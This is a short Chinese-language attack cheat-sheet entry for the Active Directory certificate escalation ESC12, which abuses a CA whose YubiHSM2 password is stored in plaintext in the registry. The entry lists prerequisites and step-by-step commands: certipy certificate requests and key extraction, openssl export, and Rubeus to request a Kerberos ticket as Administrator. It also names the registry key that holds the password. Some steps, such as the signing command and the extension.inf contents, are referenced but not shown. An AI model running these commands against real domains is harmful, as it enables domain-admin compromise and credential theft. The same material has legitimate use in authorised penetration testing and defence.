Active Directory - 证书 ESC12
ESC12 - YubiHSM 上的 ADCS CA
ESC12 漏洞发生在证书颁发机构(CA)将其私钥存储在 YubiHSM2 设备上时。该设备需要一个认证密钥(密码)才能访问,而此密码以明文形式存储在注册表中,使得拥有 CA 服务器 Shell 访问权限的攻击者能够恢复私钥。
前提条件:
- CA 证书
- 根 CA 服务器的 Shell 访问权限
利用方法:
- 为用户生成证书
certipy req -target dc-esc.esc.local -dc-ip 10.10.10.10 -u "user_esc12@esc.local" -p 'P@ssw0rd' -template User -ca <CA-Common-Name>
certipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt
certipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key
- 将 CA 证书导入用户存储
- 与 YubiHSM2 设备中的私钥关联
- 使用
extension.inf文件签名user_esc12.crt并指定主体备用名称
- extension.inf 文件内容
- 使用证书获取 Administrator 的 TGT
openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx
Rubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap
通过注册表键 HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword 中的明文密码来解锁 YubiHSM。